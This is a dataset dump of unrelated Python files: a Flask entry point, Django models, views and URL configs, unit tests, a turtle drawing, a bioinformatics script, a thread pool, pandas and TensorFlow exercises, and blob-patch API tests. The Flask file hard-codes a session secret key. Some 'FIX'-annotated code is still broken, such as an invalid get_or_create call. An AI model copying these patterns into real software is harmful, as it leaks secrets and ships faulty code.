text stringlengths 38 1.54M |
|---|
# Flask framework for backend REST API
import os
import flask
from routes import routes

app = flask.Flask(__name__)
# All API endpoints are defined in the `routes` blueprint.
app.register_blueprint(routes)
# SECURITY NOTE(review): the session secret key is hard-coded in source;
# it should be loaded from an environment variable or a secrets store.
app.secret_key = b'\xc4i\x92\xcc\x1a\xab\x9a#R\x94\xa6[\xce\xc0\xb0\t\x10$e\x1bi\xaf-\xae'
# Port is configurable via the PORT environment variable (default 8080).
port = int(os.environ.get('PORT', 8080))

if __name__ == '__main__':
    # Bind to all interfaces so the API is reachable from outside localhost
    # (required when running in a container).
    app.run(threaded=True, host='0.0.0.0', port=port)
# %load q06_bowled_players/build.py
# Default Imports
from greyatomlib.python_getting_started.q01_read_data.build import read_data

data = read_data()


# Your Solution
def bowled_out(data=data):
    """Return the batsmen dismissed 'bowled' during the 2nd innings.

    Walks every delivery of the 2nd innings and collects the batsman of
    each delivery whose wicket kind is 'bowled', in delivery order.
    """
    deliveries = data['innings'][1]['2nd innings']['deliveries']
    batsmen = []
    for ball in deliveries:
        # Each `ball` maps a delivery key to that delivery's details.
        for key, info in ball.items():
            if 'wicket' in info and info['wicket']['kind'] == 'bowled':
                batsmen.append(info['batsman'])
    return batsmen
""" wbuilder """
from .wbuilder import WebBuilder
from .wbuilder import Css
from .version import version as __version__
__all__ = ["WebBuilder", "Css"] |
__author__ = 'rizkivmaster'
import unittest
import datetime
import random
from controllers import Record, recordAccessor
def randomId():
    """Return a pseudo-random integer in [0, 10000] for unique test data."""
    return random.randint(0, 10000)
class RecordAccessorTest(unittest.TestCase):
    """Integration tests for recordAccessor CRUD operations.

    NOTE(review): these tests hit the real accessor backend and therefore
    have persistent side effects; randomized ids avoid key collisions.
    """

    def test_add(self):
        # Create a record with randomized identifiers, store it, and verify
        # it can be read back and updated.
        record = Record(date=datetime.date.today(), accountingId=str(randomId()),
                        accountingPost='KASIR', accountingType='KREDIT',
                        notes='Test' + str(randomId()), amount=randomId())
        recordAccessor.addRecord(record)
        result = recordAccessor.getRecordById(record.accountingId)
        # FIX: use unittest's assertion instead of `assert(not result == None)`
        # (identity comparison with None, and proper failure reporting).
        self.assertIsNotNone(result)
        # Re-fetch a fresh instance, then exercise updateRecord().
        del result
        result = recordAccessor.getRecordById(record.accountingId)
        result.amount = 4000
        recordAccessor.updateRecord(result)

    def test_getall(self):
        posts = ['KASIR', 'PENJUALAN', 'BELANJA']  # hoisted loop invariant
        for ii in range(1, 10):
            record = Record(date=datetime.date.today(), accountingId=str(randomId()),
                            accountingPost=posts[ii % 3], accountingType='KREDIT',
                            notes='Test' + str(randomId()), amount=randomId())
            recordAccessor.addRecord(record)
        records = recordAccessor.getAllRecords('KASIR')
        # FIX: `records != None` replaced with an explicit None assertion.
        self.assertIsNotNone(records)
# Run the full suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
# ClickSmileKaleidoscope.py
# Billy Ridgeway
# Creates a kaleidoscope of smilies reflected across the x axis.
import random  # Random library (imported but not used in the visible code).
import turtle  # Turtle graphics library.

t = turtle.Pen()         # Create the shared turtle pen used by all draw functions.
t.speed(0)               # Speed 0 is "fastest": no animation delay.
t.hideturtle()           # Hide the pen cursor itself.
turtle.bgcolor("black")  # Black background so the yellow smilies stand out.
angle = t.heading()      # Record the pen's initial heading (not used below).
# Kaleidoscope effect: one smiley per quadrant, mirrored across both axes.
def draw_kaleido(x, y):
    """Draw four smilies reflected across the x and y axes around (x, y)."""
    for sign in (1, -1):
        draw_smileyUp(sign * x, y)       # upright pair, above the x axis
    for sign in (-1, 1):
        draw_smileyD(sign * x, -y)       # inverted pair, below the x axis
def draw_smileyUp(x, y):  # Defines a function to draw a right side up smiley.
    """Draw an upright smiley whose head circle starts at (x, y)."""
    t.penup()
    t.setpos(x, y)
    t.pendown()
    # Head: filled yellow circle of radius 50.
    t.pencolor("yellow")
    t.fillcolor("yellow")
    t.begin_fill()
    t.circle(50)
    t.end_fill()
    # Left eye: small blue circle in the upper half of the head.
    t.setpos(x-15, y+60)
    t.fillcolor("blue")
    t.begin_fill()
    t.circle(10)
    t.end_fill()
    # Right eye (fill color is still blue from the left eye).
    t.setpos(x+15, y+60)
    t.begin_fill()
    t.circle(10)
    t.end_fill()
    # Mouth: thick black polyline dipping downward (a smile).
    t.setpos(x-25, y+40)
    t.pencolor("black")
    t.width(10)
    t.goto(x-10, y+20)
    t.goto(x+10, y+20)
    t.goto(x+25, y+40)
    t.width(1)  # Restore the default pen width for subsequent drawing.
def draw_smileyD(x, y):  # Defines a function to draw an upside down smiley.
    """Draw an inverted smiley (eyes low, mouth arcing upward) at (x, y)."""
    t.penup()
    t.setpos(x, y)
    t.pendown()
    # Head: filled yellow circle of radius 50.
    t.pencolor("yellow")
    t.fillcolor("yellow")
    t.begin_fill()
    t.circle(50)
    t.end_fill()
    # Left eye: placed lower than in draw_smileyUp to flip the face.
    t.setpos(x-15, y+30)
    t.fillcolor("blue")
    t.begin_fill()
    t.circle(10)
    t.end_fill()
    # Right eye (fill color is still blue from the left eye).
    t.setpos(x+15, y+30)
    t.begin_fill()
    t.circle(10)
    t.end_fill()
    # Mouth: thick black polyline arcing upward (frown from the viewer's side,
    # i.e. the smile of an upside-down face).
    t.setpos(x-25, y+60)
    t.pencolor("black")
    t.width(10)
    t.goto(x-10, y+80)
    t.goto(x+10, y+80)
    t.goto(x+25, y+60)
    t.width(1)  # Restore the default pen width for subsequent drawing.
turtle.onscreenclick(draw_kaleido)  # Register draw_kaleido as the click handler (called with the click's x, y).
|
"""
Mutate NucleotideSequence field of DBASS data to reflect alternate allele.
"""
import sys
import re
import argparse
import fileinput
def main(args):
    """Rewrite the NucleotideSequence column of a DBASS TSV.

    For each data row, splice every mutation event into the sequence:
    SNP events "(X>Y)" become the reference (X) or alternate (Y) allele,
    deletion events "(...)" are excised (alternate) or kept without their
    parentheses (reference).  The header row is passed through unchanged.

    args.input:  path to the DBASS TSV, or '-' to read stdin.
    args.output: output path, or sys.stdout (the default).
    args.ref:    when True, derive the wild-type sequence instead.
    """
    o = open(args.output, 'w') if args.output != sys.stdout else sys.stdout
    dbass = sys.stdin if args.input == '-' else open(args.input, 'r')
    try:
        for i, row in enumerate(dbass, start=1):
            fields = row.strip().split('\t')
            if i == 1:
                # Map column names to their indices using the header row.
                header = dict(zip(fields, range(len(fields))))
                o.write('\t'.join(fields) + '\n')
                continue
            orig = fields[header['NucleotideSequence']]
            seq = re.sub(r'[\[\]]', '', orig)  # drop brackets marking insertions
            # Cumulative length change from already-applied events; match
            # positions from finditer refer to the pre-edit string.
            # FIX: the original *assigned* delta each iteration, so only the
            # last event's shift was applied — wrong for 3+ events per row.
            delta = 0
            for event in re.finditer(r'\(.*?\)', seq):
                l = len(seq)
                event_str = event.group(0)
                start = event.start() + delta
                end = event.end() + delta
                if '>' in event_str:
                    # SNP event "(ref>alt)": substitute the chosen allele.
                    match = re.search(r'\((.*)>(.*)\)', event_str)
                    allele = match.group(1) if args.ref else match.group(2)
                    seq = seq[:start] + allele + seq[end:]
                elif args.ref:
                    # Deletion, wild-type: keep the bases, strip the parens.
                    # FIX: the original used filter(), which returns an
                    # iterator on Python 3 and broke the later slicing.
                    seq = ''.join(c for c in seq if c not in '()')
                else:
                    # Deletion, mutant: excise the whole "(...)" span.
                    seq = seq[:start] + seq[end:]
                delta += len(seq) - l
            fields[header['NucleotideSequence']] = seq
            o.write('\t'.join(fields) + '\n')
    finally:
        # FIX: close only what we opened; the original closed sys.stdout.
        if dbass is not sys.stdin:
            dbass.close()
        if o is not sys.stdout:
            o.close()
if __name__ == '__main__':
    # Command-line entry point: parse options, then stream-process the file.
    parser = argparse.ArgumentParser()
    parser.add_argument('--dbass', '-i', dest='input', default='-',
                        help='Input DBASS file. Accepts stdin as default.')
    parser.add_argument('--out', '-o', dest='output', default=sys.stdout)
    parser.add_argument('--ref', action='store_true',
                        help='Derive wild-type sequence instead')
    main(parser.parse_args())
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import threading
class mutiThread():
    """Run a pool of tasks across worker threads, collecting results.

    Each task is a dict with keys 'func' (a callable) and 'args' (None for
    no arguments, a dict of keyword arguments, or — new, backward
    compatible — a list/tuple of positional arguments).  The result of the
    task at pool index i is stored at index i of the returned list.
    """

    def __init__(self, task_pool, threads=1):
        self._task_pool = task_pool
        self._threads = int(threads)
        # Pre-sized result slots; slot i receives the result of task i.
        self._res = [None] * len(task_pool)
        self._lock = threading.Lock()  # guards pops from the shared pool

    def _handler(self):
        """Worker loop: pop and execute tasks until the pool is empty."""
        while True:
            # Only the pop (and the index derived from the pool length)
            # needs the lock; the task itself runs unlocked.
            with self._lock:
                c = len(self._task_pool)
                if not c:
                    break
                task = self._task_pool.pop()
            func = task['func']
            args = task['args']
            # The popped task came from index c-1, so store its result there.
            if args is None:
                self._res[c - 1] = func()
            elif isinstance(args, dict):
                self._res[c - 1] = func(**args)
            elif isinstance(args, (list, tuple)):
                # Generalization: positional arguments are now accepted too.
                self._res[c - 1] = func(*args)
            else:
                raise ValueError ('task_pool`s args must be a dict')

    def run(self):
        """Start the workers, wait for them to finish, return the results."""
        workers = [threading.Thread(target=self._handler)
                   for _ in range(self._threads)]
        for w in workers:
            w.start()
        for w in workers:
            w.join()
        return self._res
|
from django.contrib import admin
from .models import Blog, BlogLike
# Register your models here.
# Admin configuration for the blog app.
class BlogAdmin(admin.ModelAdmin):
    """Customizes the field layout of the Blog change form."""
    fieldsets = [
        (
            None,
            {"fields": ["title", "content", "author",
                        "is_published", "is_public"]},
        ),
    ]


admin.site.register(Blog, BlogAdmin)
admin.site.register(BlogLike)
|
from django.urls import path
from . import views
from django.contrib.auth.views import (
login, logout, password_reset, password_reset_done, password_reset_confirm,
password_reset_complete
)
# FIX: path() treats "(?P<...>...)" as a literal string, so the original
# password-reset-confirm route could never match a real reset link; regex
# routes must use re_path() with a raw regex pattern.
from django.urls import re_path

app_name = 'accounts'

urlpatterns = [
    path('', views.index, name='index'),
    path('login/', login, {'template_name':'accounts/login.html'}, name='login'),
    path('logout/', logout, {'next_page': 'accounts:index'}, name='logout'),
    path('register/', views.register, name='register'),
    path('profile/', views.view_profile, name='view_profile'),
    path('profile/edit/', views.edit_profile, name='edit_profile'),
    path('change-password/', views.change_password, name='change-password'),
    path('reset-password/', password_reset, {'template_name':'accounts/reset_password.html', 'post_reset_redirect':'accounts:password_reset_done', 'email_template_name':'accounts/reset_password_email.html'}, name='reset-password'),
    path('reset-password/done/', password_reset_done, {'template_name':'accounts/reset_password_done.html'}, name='password_reset_done'),
    re_path(r'^reset-password/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', password_reset_confirm, name='password_reset_confirm'),
    path('reset-password/complete/', password_reset_complete, name='password_reset_complete'),
]
|
'''
RS review from desktop, corrected with () and ""
'''
# Print each review line in order (text kept exactly as committed).
lines = (
    "First line created by RS from github",
    "Second line updated by sailu from github",
    "Third line updte by ravi from local system",
    "Fouth line update by ravi from local system branch Develop",
)
for line in lines:
    print(line)
|
import math
class Environment:
    """Physical constants describing a simulation environment."""

    def __init__(self, gravity=9.81, air_density=1.225):
        # Defaults: standard gravity [m/s^2], sea-level air density [kg/m^3].
        self.gravity = gravity
        self.air_density = air_density

    def __repr__(self):
        name = self.__class__.__name__
        return f'<{name}: gravity={self.gravity}, air_density={self.air_density}>'
def compute_air_density(temperature_degc, relative_humidity, air_pressure_mb):
    """Return moist-air density [kg/m^3] for the given conditions.

    Uses the Clausius-Clapeyron relation for saturation vapor pressure and
    the virtual-temperature form of the ideal gas law.

    temperature_degc:  air temperature [degC]
    relative_humidity: fractional relative humidity in [0, 1]
    air_pressure_mb:   air pressure [mb]
    """
    ZERO_DEGC_IN_K = 273.15
    ESO_MB = 6.11   # saturation vapor pressure at 273.15 K (0 degC) [mb]
    LV = 2.5e6      # latent heat of vaporization [J/kg]
    RV = 461.5      # gas constant for water vapor [J/kg/K]
    RD = 287        # gas constant for dry air [J/kg/K]

    temperature_k = temperature_degc + ZERO_DEGC_IN_K
    # Clausius-Clapeyron: saturation vapor pressure at temperature_k [mb].
    saturation_vp = ESO_MB * math.exp((LV / RV) * (1 / ZERO_DEGC_IN_K - 1 / temperature_k))
    vapor_pressure = relative_humidity * saturation_vp            # [mb]
    specific_humidity = 0.622 * (vapor_pressure / air_pressure_mb)  # [-]
    # Virtual temperature folds humidity into the gas-law temperature term.
    virtual_temperature_k = temperature_k * (1 + 0.61 * specific_humidity)
    air_pressure_pa = air_pressure_mb * 100
    return air_pressure_pa / (RD * virtual_temperature_k)
|
# -*- coding: utf-8 -*-
import pandas as pd

# Load the IGN game-review data set.
reviews = pd.read_csv("ign.csv")

# FIX: the original referenced an undefined name `df` (NameError at
# runtime); the DataFrame is loaded as `reviews`.
xb = (reviews['score'] > 7) & (reviews['platform'] == "Xbox One")
x = xb.value_counts()
print("xbox one score is >7 :", x[1])
ps = (reviews['platform'] == "PlayStation 4")
print(ps)
p = ps.value_counts()
q = (reviews['platform'] == "Xbox One")
q = q.value_counts()
q[1]
p[1]

# Same filter expressed with an intermediate DataFrame for inspection.
xbox_one_filter = (reviews["score"] > 7) & (reviews["platform"] == "Xbox One")
filtered_reviews = reviews[xbox_one_filter]
filtered_reviews.head()

# Score distributions per platform, plus the filtered Xbox One subset.
reviews[reviews["platform"] == "PlayStation 4"]["score"].plot(kind="hist", legend=True)
reviews[reviews["platform"] == "Xbox One"]["score"].plot(kind="hist", legend=True)
filtered_reviews["score"].plot(kind="hist", legend=True)
|
from datetime import datetime
from google.appengine.ext import db
from chzis.congregation.models import CongregationMember
class Lesson(db.Model):
    """A numbered lesson; boolean flags mark the assignment formats it supports."""
    number = db.IntegerProperty(required=True)   # lesson ordinal
    name = db.StringProperty(required=True)
    reading = db.BooleanProperty()     # lesson can be given as a reading
    demo = db.BooleanProperty()        # ... as a demonstration
    discourse = db.BooleanProperty()   # ... as a discourse
    description = db.StringProperty()
    last_modification = db.DateTimeProperty(auto_now=True)  # refreshed on every put()
class Background(db.Model):
    """A numbered background/setting option referenced by student profiles."""
    number = db.IntegerProperty(required=True)
    name = db.StringProperty(required=True)
    description = db.StringProperty()
    last_modification = db.DateTimeProperty(auto_now=True)  # refreshed on every put()
class StudentProfile(db.Model):
    """Tracks one congregation member's progress through a lesson."""
    person = db.ReferenceProperty(CongregationMember, required=True)
    lesson = db.ReferenceProperty(Lesson, required=True)
    lesson_passed = db.BooleanProperty()   # outcome of the lesson, once graded
    lesson_comments = db.StringProperty()
    background = db.ReferenceProperty(Background)  # optional setting for the assignment
    description = db.StringProperty()
    creation_date = db.DateProperty()
    presentation_date = db.DateProperty()
    topic = db.StringProperty()
    last_modification = db.DateTimeProperty(auto_now=True)  # refreshed on every put()
|
# coding=utf-8
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from manageset.models import UserProfile, Sets, Words, Kanji, KnownKanji, KnownWords, UserSets
from django.db.models import Count, Min, Sum, Avg
from django.contrib.auth.models import User
from datetime import datetime, timedelta, date
from django.utils.timezone import utc
import time
from django.utils import timezone
from django.core.urlresolvers import reverse
from django.views.generic import View
from django.http import JsonResponse
import json
from django.core.serializers.json import DjangoJSONEncoder
from api.serializers import *
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.decorators import renderer_classes
from rest_framework.renderers import JSONRenderer, BrowsableAPIRenderer
from rest_framework.response import Response
from utils import *
def index(request):
    """Serve the compiled single-page-app entry point."""
    return render(request,'production-dist/index.html')
@api_view(['GET'])
def get_master_review_decks(request):
    """Return every deck that has a master ordering, serialized without words."""
    decks = Sets.objects.exclude(master_order__isnull=True)
    serializer = SetsSerializerWithoutWords(decks, many=True)
    data = serializer.data
    return Response(data)
@api_view(['GET'])
def get_user_sets(request):
    """Return the user's decks in chunks of 20, each chunk annotated with
    how many of its decks are completed."""
    userprofile = request.user.userprofile
    decks = UserSets.objects.filter(user_profile_fk=userprofile).order_by('id')
    data = UserSetsSerializer(decks, many=True).data

    chunk_size = 20
    deck_count = len(data)
    chunked_data = []
    chunk = {'chunk_list': []}
    completed_count = 0
    for index, each in enumerate(data):
        if each['completion_status']:
            completed_count += 1
        chunk['chunk_list'].append(each)
        # Close out a chunk every `chunk_size` decks, or at the very end.
        if (index + 1) % chunk_size == 0 or index == deck_count - 1:
            chunk['completed_count'] = completed_count
            chunked_data.append(chunk)
            completed_count = 0
            # FIX: the reset dict previously used the misspelled key
            # 'complete_count', which leaked into every chunk after the
            # first; use 'completed_count' consistently.
            chunk = {'chunk_list': [], 'completed_count': 0}
    return Response(chunked_data)
@api_view(['GET'])
def get_analytics_data(request):
    """Return today's analytics log for the requesting user."""
    # FIX: QuerySet.get_or_create returns an (object, created) tuple; the
    # original passed the whole tuple to the serializer.  Also removed the
    # unused `username` local.
    todays_log, _created = AnalyticsLog.objects.get_or_create(request.user)
    serializer = AnalyticsLogSerializer(todays_log)
    return Response(serializer.data)
@api_view(['GET'])
def get_chart_data(request):
    """Return cumulative words-studied data points plus an ideal-pace line."""
    userprofile = request.user.userprofile
    analytics_logs = AnalyticsLog.objects.filter(user_profile=userprofile)
    log_count = analytics_logs.count()
    # TODO for future - split different chart queries into different functions or a switch statement
    words_studied_count = list(analytics_logs.values_list('words_studied_count', flat=True).order_by('last_modified'))
    words_studied_count.insert(0, 0)  # anchor the chart at zero
    # FIX: removed the unused `master_words_count` local — it cost an extra
    # COUNT query per request for nothing.
    base = date.today()
    # One x-axis date per log entry, oldest first, ending today.
    date_list = [base - timedelta(days=x) for x in range(log_count, -1, -1)]
    # Ideal pace line: 15 words per day.
    ideal_data_points = [15 * x for x in range(0, log_count + 1)]
    return Response({'x_axis_data': date_list,
                     'data_points': words_studied_count,
                     'ideal_data_points': ideal_data_points})
# TODO look into moving each individual calculation into model
@api_view(['GET'])
def get_review_data(request):
    """Summarize the user's spaced-repetition review state.

    Returns: the next review (a countdown string when nothing is due yet,
    otherwise the count of reviews due now), the number of reviews within
    the next 24 hours, per-tier word counts, and the username.
    """
    userprofile = request.user.userprofile
    update_word_queue(request.user)  # refresh queue timings before counting
    known_words = KnownWords.objects.filter(user_profile = userprofile)
    tier_counts = known_words.values('tier_level').annotate(count = Count('tier_level')).order_by('tier_level')
    master_word_count = Words.objects.filter(master_order__gt=0).count()
    count_dict = {}
    studied_word_sum = 0
    for each in tier_counts:
        count_dict[each['tier_level']] = each['count']
    #if not in above count_dict then set to 0
    for each in range(10):
        try:
            studied_word_sum += count_dict[each]
        except KeyError:
            count_dict[each] = 0
    # Tier 0 is redefined here as "not yet studied": all master words minus
    # every studied word (including any originally reported at tier 0).
    count_dict[0] = master_word_count - studied_word_sum
    reviews_due_count = known_words.filter(time_until_review__lte = 0).count()
    reviews_24_hours = (known_words.filter(
        user_profile = userprofile,
        #within the next day
        time_until_review__range = (0,86400))
        .values('time_until_review')
        .order_by('time_until_review')
    )
    next_review_time = reviews_24_hours.first()
    reviews_24_hours_count = reviews_24_hours.count() + reviews_due_count
    # Nothing due right now: report the countdown to the soonest upcoming
    # review, trimmed to H:MM:SS; otherwise report how many are due.
    if reviews_due_count == 0 and next_review_time:
        next_review = str(timedelta(seconds = next_review_time['time_until_review'])).split('.')[0]
    else:
        next_review = reviews_due_count
    return JsonResponse({'next_review':next_review, 'next_day':reviews_24_hours_count, 'tier_counts':count_dict, 'username':request.user.username })
|
from django.conf import settings
from django.db import models
from django.utils import timezone
#this line defines our model
#class is keyword and post is the name of the model
#models.Model means that post is a django model,it will be saved in database
class Post(models.Model):
    """A blog post written by a user."""
    # Deleting the author cascades and deletes their posts.
    author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    title = models.CharField(max_length=200)   # short title, capped at 200 chars
    text = models.TextField()                  # unbounded body text
    created_date = models.DateTimeField(default=timezone.now)   # set at creation
    published_date = models.DateTimeField(blank=True, null=True)  # unset until publish()

    def publish(self):
        """Stamp the post as published now and persist it."""
        self.published_date = timezone.now()
        self.save()

    def __str__(self):
        """Posts display as their title (e.g. in the admin)."""
        return self.title
# Create your models here.
|
import numpy as np
import cv2
import tensorflow as tf

# Build a tiny synthetic data set: one rendered image per digit 0-9.
data = {
    "labels": np.zeros((10, 10)),   # one-hot labels, one row per digit
    "images": np.zeros((10, 784)),  # flattened 28x28 images scaled to [0, 1]
}
font = cv2.FONT_HERSHEY_SIMPLEX
for i in range(10):
    # Render digit i large, then downscale to MNIST-sized 28x28.
    img = np.zeros((400, 310), np.uint8)
    cv2.putText(img, str(i), (0, 370), font, 16, (255, 255, 255), 12)
    img = cv2.resize(img, (28, 28))
    cv2.imwrite("./images/" + str(i) + ".png", img)
    label = [0] * 10
    label[i] = 1  # one-hot encode digit i
    data["labels"][i] = label
    data["images"][i] = img.flatten() / 255.0

# Single-layer softmax classifier (TensorFlow 1.x graph API, as used here).
x = tf.placeholder("float", [None, 784])
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x, W) + b)
y_ = tf.placeholder("float", [None, 10])
cross_entropy = -tf.reduce_sum(y_ * tf.log(y))
train_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)

init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)

# Train our model.  FIX: renamed `iter` -> `num_iterations`; the original
# name shadowed the `iter` builtin.
num_iterations = 1000
for i in range(num_iterations):
    sess.run(train_step, feed_dict={x: data["images"], y_: data["labels"]})

# Evaluate on the (training) data — with only 10 samples this checks fit,
# not generalization.
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
print("Accuracy: ", sess.run(accuracy, feed_dict={x: data["images"], y_: data["labels"]}))

my_classification = sess.run(tf.argmax(y, 1), feed_dict={x: [data["images"][5]]})
print('Neural Network predicted', my_classification[0], "for your digit")
#!/usr/bin/python26
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/lib")
import unittest
from acl import ACL
from unit_class import *
import sys
import random
from config import ConfigService
#diff_path = os.path.dirname(os.path.abspath(__file__))
# Directory where test artifacts (old/new blobs, zcdiff output) are written.
diff_path = os.path.dirname(os.path.abspath(__file__)) + "/../results"
class blob_diff(gh_unit):
"""/*****************************************************************************************
user.blob.patch TCs
********************************************************************************************"""
def test_user_blob_patch_existing_blob(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_series_diffs(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
oldFile1 = diff_path + '/old1.txt'
os.system('cp %s %s' %(newFile, oldFile1))
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
os.system('rm %s/out.zcdiff'%diff_path)
result = user_blob_get(zauth)
oldFile = oldFile1
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_empty_old_blob(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = ''
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write('dfssdfio^&*^&*678687')
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request: (P3:Jira Defect: SEG-9315)')
os.system('rm %s/out.zcdiff'%diff_path)
'''
def test_user_blob_patch_same_contents(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
#path = '/home/sdoddabasayya/blobDiff/php-zcdiff'
#oldBlob = 'old.txt'
#data = data_to_post()
data = "werkjl3234#$#$"
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(data)
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Manually it passes--please reverify')
os.system('rm %s/out.zcdiff'%diff_path)
#print "Ret: %s\n"%ret
#print "Result: %s\n"%result
#print "*********************************************************************\n"
'''
def test_user_blob_patch_empty_token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
zauth= None
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[403])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_expired_token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
zauth= AuthSystem.getExpiredToken(Constants.ZID)
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[403])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_invalid_CAS(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
cas_invalid = cas + 1
